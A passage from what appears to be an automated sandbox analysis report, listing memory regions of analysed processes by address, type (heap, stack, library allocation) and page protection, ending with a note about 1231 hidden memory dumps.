trusted library allocation
|
page read and write
|
||
11A0000
|
heap
|
page read and write
|
||
7FF886D34000
|
trusted library allocation
|
page read and write
|
||
4DDE000
|
stack
|
page read and write
|
||
1CD30525000
|
heap
|
page read and write
|
||
D20850D000
|
stack
|
page read and write
|
||
1CD30398000
|
heap
|
page read and write
|
||
7FF887150000
|
trusted library allocation
|
page execute and read and write
|
||
1CD3048B000
|
heap
|
page read and write
|
||
2680000
|
heap
|
page execute and read and write
|
||
242E7F50000
|
heap
|
page read and write
|
||
1CD30300000
|
heap
|
page read and write
|
||
1CD31E57000
|
trusted library allocation
|
page read and write
|
||
1CD4A30B000
|
heap
|
page read and write
|
||
C20000
|
heap
|
page read and write
|
||
177DD281000
|
trusted library allocation
|
page read and write
|
||
2FAE000
|
stack
|
page read and write
|
||
7FF887020000
|
trusted library allocation
|
page read and write
|
||
7FF887183000
|
trusted library allocation
|
page read and write
|
||
7FF886F90000
|
trusted library allocation
|
page read and write
|
||
177CE2B3000
|
trusted library allocation
|
page read and write
|
||
7FF886DE6000
|
trusted library allocation
|
page execute and read and write
|
||
9AD000
|
heap
|
page read and write
|
||
1CD31D00000
|
trusted library allocation
|
page read and write
|
||
7FF886F60000
|
trusted library allocation
|
page read and write
|
||
7FF886FC0000
|
trusted library allocation
|
page read and write
|
||
1368CA08000
|
heap
|
page read and write
|
||
7FF886FD7000
|
trusted library allocation
|
page read and write
|
||
177E5A09000
|
heap
|
page read and write
|
||
177CCFE0000
|
trusted library allocation
|
page read and write
|
||
1CD420BD000
|
trusted library allocation
|
page read and write
|
||
2691000
|
trusted library allocation
|
page read and write
|
||
1700000
|
heap
|
page read and write
|
||
7FF887040000
|
trusted library allocation
|
page read and write
|
||
7B0000
|
heap
|
page read and write
|
||
BA6B7E000
|
stack
|
page read and write
|
||
7FF886EE1000
|
trusted library allocation
|
page read and write
|
||
1368C8E0000
|
heap
|
page read and write
|
||
7FF886E40000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886F00000
|
trusted library allocation
|
page execute and read and write
|
||
1C77E000
|
stack
|
page read and write
|
||
177DD544000
|
trusted library allocation
|
page read and write
|
||
2F7E679000
|
stack
|
page read and write
|
||
242E809D000
|
heap
|
page read and write
|
||
23F6000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887092000
|
trusted library allocation
|
page read and write
|
||
242CDFE0000
|
heap
|
page read and write
|
||
1368F4DC000
|
trusted library allocation
|
page read and write
|
||
242E7DC7000
|
heap
|
page read and write
|
||
7DF406490000
|
trusted library allocation
|
page execute and read and write
|
||
177E5771000
|
heap
|
page read and write
|
||
1368C987000
|
heap
|
page read and write
|
||
1368E410000
|
heap
|
page execute and read and write
|
||
A1D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D3D000
|
trusted library allocation
|
page execute and read and write
|
||
6F0000
|
heap
|
page read and write
|
||
1CD30416000
|
heap
|
page read and write
|
||
7FF886ECA000
|
trusted library allocation
|
page read and write
|
||
228E000
|
stack
|
page read and write
|
||
2F7EABE000
|
stack
|
page read and write
|
||
BA77CB000
|
stack
|
page read and write
|
||
136A6AA0000
|
heap
|
page read and write
|
||
177CE372000
|
trusted library allocation
|
page read and write
|
||
1C0000
|
heap
|
page read and write
|
||
1368C98B000
|
heap
|
page read and write
|
||
7FF887030000
|
trusted library allocation
|
page read and write
|
||
242CDD62000
|
heap
|
page read and write
|
||
1CD4A701000
|
heap
|
page read and write
|
||
7FF886ECA000
|
trusted library allocation
|
page read and write
|
||
7FF886D12000
|
trusted library allocation
|
page read and write
|
||
1369E490000
|
trusted library allocation
|
page read and write
|
||
177CB73B000
|
heap
|
page read and write
|
||
7FF886DD6000
|
trusted library allocation
|
page read and write
|
||
177CF051000
|
trusted library allocation
|
page read and write
|
||
242D0253000
|
trusted library allocation
|
page read and write
|
||
242E7D10000
|
heap
|
page read and write
|
||
7FF886D7C000
|
trusted library allocation
|
page execute and read and write
|
||
1CD33195000
|
trusted library allocation
|
page read and write
|
||
7FF886D2D000
|
trusted library allocation
|
page execute and read and write
|
||
1247000
|
heap
|
page read and write
|
||
177E58A4000
|
heap
|
page read and write
|
||
242CF750000
|
heap
|
page execute and read and write
|
||
7FF886D14000
|
trusted library allocation
|
page read and write
|
||
177DD546000
|
trusted library allocation
|
page read and write
|
||
7FF886E16000
|
trusted library allocation
|
page execute and read and write
|
||
7FF4FAF00000
|
trusted library allocation
|
page execute and read and write
|
||
1368F398000
|
trusted library allocation
|
page read and write
|
||
7FF886EF4000
|
trusted library allocation
|
page read and write
|
||
7FF886ED0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887063000
|
trusted library allocation
|
page read and write
|
||
136A6A07000
|
heap
|
page execute and read and write
|
||
CBE000
|
heap
|
page read and write
|
||
7FF8870B0000
|
trusted library allocation
|
page read and write
|
||
54BE000
|
stack
|
page read and write
|
||
2A2D000
|
trusted library allocation
|
page read and write
|
||
7FF886F20000
|
trusted library allocation
|
page execute and read and write
|
||
D20870E000
|
stack
|
page read and write
|
||
177DD62B000
|
trusted library allocation
|
page read and write
|
||
760000
|
trusted library allocation
|
page read and write
|
||
5583BFE000
|
stack
|
page read and write
|
||
D2A000
|
heap
|
page read and write
|
||
1CD32FAA000
|
trusted library allocation
|
page read and write
|
||
51A000
|
heap
|
page read and write
|
||
63E000
|
heap
|
page read and write
|
||
4F60000
|
trusted library allocation
|
page read and write
|
||
6F0000
|
heap
|
page read and write
|
||
7FF886FD0000
|
trusted library allocation
|
page read and write
|
||
7FF886EB0000
|
trusted library allocation
|
page read and write
|
||
177CF02C000
|
trusted library allocation
|
page read and write
|
||
7DF4A5440000
|
trusted library allocation
|
page execute and read and write
|
||
242DF821000
|
trusted library allocation
|
page read and write
|
||
7FF886D23000
|
trusted library allocation
|
page execute and read and write
|
||
1B5EE000
|
stack
|
page read and write
|
||
7FF886DE0000
|
trusted library allocation
|
page read and write
|
||
1368C97C000
|
heap
|
page read and write
|
||
1CD33722000
|
trusted library allocation
|
page read and write
|
||
136A694A000
|
heap
|
page read and write
|
||
7FF886FF1000
|
trusted library allocation
|
page read and write
|
||
7FF886DCC000
|
trusted library allocation
|
page execute and read and write
|
||
3EC000
|
stack
|
page read and write
|
||
5070000
|
trusted library allocation
|
page read and write
|
||
CFC000
|
heap
|
page read and write
|
||
177DD4CA000
|
trusted library allocation
|
page read and write
|
||
242E7FC5000
|
heap
|
page read and write
|
||
1CD304D0000
|
heap
|
page execute and read and write
|
||
136A6B80000
|
heap
|
page execute and read and write
|
||
BA638E000
|
stack
|
page read and write
|
||
2F7EB3E000
|
stack
|
page read and write
|
||
2A40000
|
heap
|
page execute and read and write
|
||
678000
|
heap
|
page read and write
|
||
2F7F88E000
|
stack
|
page read and write
|
||
1BD2E000
|
stack
|
page read and write
|
||
5060000
|
trusted library allocation
|
page read and write
|
||
66D000
|
heap
|
page read and write
|
||
548000
|
heap
|
page read and write
|
||
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
177DD271000
|
trusted library allocation
|
page read and write
|
||
7FF886D14000
|
trusted library allocation
|
page read and write
|
||
1075000
|
heap
|
page read and write
|
||
177CE0E0000
|
trusted library allocation
|
page read and write
|
||
C50000
|
heap
|
page read and write
|
||
4EE0000
|
trusted library allocation
|
page read and write
|
||
7FF886D12000
|
trusted library allocation
|
page read and write
|
||
508000
|
heap
|
page read and write
|
||
2F7E7FD000
|
stack
|
page read and write
|
||
7FF886FA0000
|
trusted library allocation
|
page read and write
|
||
1368C900000
|
heap
|
page read and write
|
||
1368C99D000
|
heap
|
page read and write
|
||
242CDD8D000
|
heap
|
page read and write
|
||
A14000
|
trusted library allocation
|
page read and write
|
||
2405000
|
trusted library allocation
|
page execute and read and write
|
||
510000
|
heap
|
page read and write
|
||
4B0A000
|
trusted library allocation
|
page read and write
|
||
1CD32D4E000
|
trusted library allocation
|
page read and write
|
||
E90000
|
trusted library allocation
|
page read and write
|
||
1368F5F7000
|
trusted library allocation
|
page read and write
|
||
23F2000
|
trusted library allocation
|
page read and write
|
||
1C540000
|
heap
|
page read and write
|
||
1CBBE000
|
stack
|
page read and write
|
||
7FF887064000
|
trusted library allocation
|
page read and write
|
||
120F000
|
heap
|
page read and write
|
||
7FF886F14000
|
trusted library allocation
|
page read and write
|
||
7FF886F55000
|
trusted library allocation
|
page read and write
|
||
4AD0000
|
heap
|
page read and write
|
||
7FF886D0D000
|
trusted library allocation
|
page execute and read and write
|
||
4EEB000
|
trusted library allocation
|
page read and write
|
||
1205000
|
heap
|
page read and write
|
||
E4E000
|
stack
|
page read and write
|
||
7FF887069000
|
trusted library allocation
|
page read and write
|
||
7FF886D14000
|
trusted library allocation
|
page read and write
|
||
1C530000
|
heap
|
page read and write
|
||
1CD336C3000
|
trusted library allocation
|
page read and write
|
||
C91000
|
heap
|
page read and write
|
||
7FF887090000
|
trusted library allocation
|
page read and write
|
||
1CD303EF000
|
heap
|
page read and write
|
||
1000000
|
trusted library allocation
|
page read and write
|
||
177CB690000
|
heap
|
page read and write
|
||
D2079BE000
|
stack
|
page read and write
|
||
84B1CFF000
|
unkown
|
page read and write
|
||
7FF886D5C000
|
trusted library allocation
|
page execute and read and write
|
||
5583EBF000
|
stack
|
page read and write
|
||
1368E421000
|
trusted library allocation
|
page read and write
|
||
1368F39C000
|
trusted library allocation
|
page read and write
|
||
C85000
|
heap
|
page read and write
|
||
1CD4A4D0000
|
heap
|
page execute and read and write
|
||
1CD4A6E8000
|
heap
|
page read and write
|
||
A2D000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
242CDDD6000
|
heap
|
page read and write
|
||
1180000
|
heap
|
page read and write
|
||
D38000
|
heap
|
page read and write
|
||
12251000
|
trusted library allocation
|
page read and write
|
||
5FE000
|
heap
|
page read and write
|
||
242E8065000
|
heap
|
page read and write
|
||
7FF886D20000
|
trusted library allocation
|
page read and write
|
||
242E7E10000
|
heap
|
page read and write
|
||
177E5AC0000
|
heap
|
page read and write
|
||
7FF886D13000
|
trusted library allocation
|
page execute and read and write
|
||
1CD33BF8000
|
trusted library allocation
|
page read and write
|
||
D207A3C000
|
stack
|
page read and write
|
||
5E54000
|
heap
|
page read and write
|
||
7F7B0000
|
trusted library allocation
|
page execute and read and write
|
||
BA66FE000
|
stack
|
page read and write
|
||
7FF886EB0000
|
trusted library allocation
|
page read and write
|
||
177CEA3F000
|
trusted library allocation
|
page read and write
|
||
1CD49DDE000
|
heap
|
page read and write
|
||
7FF886FB0000
|
trusted library allocation
|
page read and write
|
||
5583F37000
|
stack
|
page read and write
|
||
13690220000
|
trusted library allocation
|
page read and write
|
||
7FF88716D000
|
trusted library allocation
|
page read and write
|
||
1AE5D000
|
stack
|
page read and write
|
||
1CD31DC0000
|
heap
|
page read and write
|
||
A20000
|
trusted library allocation
|
page read and write
|
||
1369E709000
|
trusted library allocation
|
page read and write
|
||
1369E710000
|
trusted library allocation
|
page read and write
|
||
7FF887072000
|
trusted library allocation
|
page read and write
|
||
1AF6E000
|
stack
|
page read and write
|
||
242CDD92000
|
heap
|
page read and write
|
||
F80000
|
heap
|
page read and write
|
||
1B64E000
|
stack
|
page read and write
|
||
242E7FE7000
|
heap
|
page read and write
|
||
1CD330D8000
|
trusted library allocation
|
page read and write
|
||
7FF887089000
|
trusted library allocation
|
page read and write
|
||
2729000
|
trusted library allocation
|
page read and write
|
||
1368C985000
|
heap
|
page read and write
|
||
1B56B000
|
stack
|
page read and write
|
||
7FF887160000
|
trusted library allocation
|
page read and write
|
||
7FF886E16000
|
trusted library allocation
|
page execute and read and write
|
||
C30000
|
heap
|
page read and write
|
||
242D0922000
|
trusted library allocation
|
page read and write
|
||
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
A13000
|
trusted library allocation
|
page execute and read and write
|
||
1CD303D1000
|
heap
|
page read and write
|
||
50CE000
|
stack
|
page read and write
|
||
7FF886EB2000
|
trusted library allocation
|
page read and write
|
||
18811D10000
|
heap
|
page read and write
|
||
18811DF0000
|
heap
|
page read and write
|
||
242D0834000
|
trusted library allocation
|
page read and write
|
||
7FF88716E000
|
trusted library allocation
|
page read and write
|
||
13690245000
|
trusted library allocation
|
page read and write
|
||
242E7D56000
|
heap
|
page read and write
|
||
2407000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
478E000
|
stack
|
page read and write
|
||
177E5702000
|
heap
|
page read and write
|
||
242CDCA0000
|
heap
|
page read and write
|
||
7FF886D4B000
|
trusted library allocation
|
page read and write
|
||
1A89C000
|
stack
|
page read and write
|
||
7FF886EF8000
|
trusted library allocation
|
page read and write
|
||
81E000
|
stack
|
page read and write
|
||
D1E000
|
heap
|
page read and write
|
||
1CD3041A000
|
heap
|
page read and write
|
||
7FF886F10000
|
trusted library allocation
|
page read and write
|
||
2421000
|
trusted library allocation
|
page read and write
|
||
273C000
|
trusted library allocation
|
page read and write
|
||
12421000
|
trusted library allocation
|
page read and write
|
||
3040000
|
heap
|
page execute and read and write
|
||
904000
|
heap
|
page read and write
|
||
1368EE72000
|
trusted library allocation
|
page read and write
|
||
1B070000
|
heap
|
page read and write
|
||
1CD4A322000
|
heap
|
page read and write
|
||
1369E718000
|
trusted library allocation
|
page read and write
|
||
1CD32E90000
|
trusted library allocation
|
page read and write
|
||
CE0000
|
heap
|
page read and write
|
||
1368E649000
|
trusted library allocation
|
page read and write
|
||
1D2BD000
|
stack
|
page read and write
|
||
242E7F40000
|
heap
|
page read and write
|
||
24B0000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886FF5000
|
trusted library allocation
|
page read and write
|
||
242DFB08000
|
trusted library allocation
|
page read and write
|
||
2AC0000
|
trusted library allocation
|
page read and write
|
||
7FF886EE0000
|
trusted library allocation
|
page execute and read and write
|
||
BA6977000
|
stack
|
page read and write
|
||
3691000
|
trusted library allocation
|
page read and write
|
||
242E7F77000
|
heap
|
page read and write
|
||
7FF887120000
|
trusted library allocation
|
page read and write
|
||
BA794E000
|
stack
|
page read and write
|
||
7FF887098000
|
trusted library allocation
|
page read and write
|
||
BA7849000
|
stack
|
page read and write
|
||
7FF886F00000
|
trusted library allocation
|
page execute and read and write
|
||
1C223000
|
stack
|
page read and write
|
||
177CB5B0000
|
heap
|
page read and write
|
||
7FF886D04000
|
trusted library allocation
|
page read and write
|
||
1368C940000
|
heap
|
page read and write
|
||
1CD329DF000
|
trusted library allocation
|
page read and write
|
||
780000
|
unkown
|
page readonly
|
||
242E7FAD000
|
heap
|
page read and write
|
||
7FF887166000
|
trusted library allocation
|
page read and write
|
||
DE7000
|
heap
|
page read and write
|
||
177CE557000
|
trusted library allocation
|
page read and write
|
||
2F7EBBD000
|
stack
|
page read and write
|
||
242D0808000
|
trusted library allocation
|
page read and write
|
||
2F7E937000
|
stack
|
page read and write
|
||
1368C983000
|
heap
|
page read and write
|
||
136901FB000
|
trusted library allocation
|
page read and write
|
||
505A000
|
trusted library allocation
|
page read and write
|
||
177E5909000
|
heap
|
page read and write
|
||
29D4000
|
trusted library allocation
|
page read and write
|
||
5110000
|
trusted library allocation
|
page execute and read and write
|
||
7FF887140000
|
trusted library allocation
|
page read and write
|
||
1368C9C5000
|
heap
|
page read and write
|
||
D30000
|
heap
|
page read and write
|
||
2AC2000
|
trusted library allocation
|
page read and write
|
||
3161000
|
trusted library allocation
|
page read and write
|
||
242CDD40000
|
trusted library allocation
|
page read and write
|
||
177CB6F0000
|
heap
|
page read and write
|
||
5584038000
|
stack
|
page read and write
|
||
7FF887103000
|
trusted library allocation
|
page read and write
|
||
242E7CB0000
|
trusted library allocation
|
page read and write
|
||
7FF887150000
|
trusted library allocation
|
page execute and read and write
|
||
8D8000
|
heap
|
page read and write
|
||
2F7EA39000
|
stack
|
page read and write
|
||
2AA3000
|
trusted library allocation
|
page read and write
|
||
7FF886EB5000
|
trusted library allocation
|
page read and write
|
||
7FF887140000
|
trusted library allocation
|
page execute and read and write
|
||
242D07A3000
|
trusted library allocation
|
page read and write
|
||
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
7FF886D33000
|
trusted library allocation
|
page execute and read and write
|
||
2F7E5FE000
|
stack
|
page read and write
|
||
7FF886EB2000
|
trusted library allocation
|
page read and write
|
||
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
BA6C7E000
|
stack
|
page read and write
|
||
7FF886DC0000
|
trusted library allocation
|
page read and write
|
||
1CD4A630000
|
heap
|
page read and write
|
||
7FF886DE6000
|
trusted library allocation
|
page read and write
|
||
177DD53C000
|
trusted library allocation
|
page read and write
|
||
242CFCCD000
|
trusted library allocation
|
page read and write
|
||
1368C8D0000
|
heap
|
page read and write
|
||
7FF88709A000
|
trusted library allocation
|
page read and write
|
||
177CB704000
|
heap
|
page read and write
|
||
177CB739000
|
heap
|
page read and write
|
||
242CF801000
|
trusted library allocation
|
page read and write
|
||
D207577000
|
stack
|
page read and write
|
||
7FF886D33000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886FE0000
|
trusted library allocation
|
page read and write
|
||
1CD33554000
|
trusted library allocation
|
page read and write
|
||
7FF886E50000
|
trusted library allocation
|
page execute and read and write
|
||
7FF886D32000
|
trusted library allocation
|
page read and write
|
||
1368C935000
|
heap
|
page read and write
|
||
136A6CF3000
|
heap
|
page read and write
|
||
1368E330000
|
heap
|
page read and write
|
||
5584D0E000
|
stack
|
page read and write
|
||
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
7FF886D2D000
|
trusted library allocation
|
page execute and read and write
|
||
242D0AA4000
|
trusted library allocation
|
page read and write
|
||
136A6BB0000
|
heap
|
page read and write
|
||
BA6BFF000
|
stack
|
page read and write
|
||
1B6EE000
|
stack
|
page read and write
|
||
7FF887000000
|
trusted library allocation
|
page read and write
|
||
5D6000
|
heap
|
page read and write
|
||
750000
|
heap
|
page read and write
|
There are 1231 hidden memdumps, click here to show them.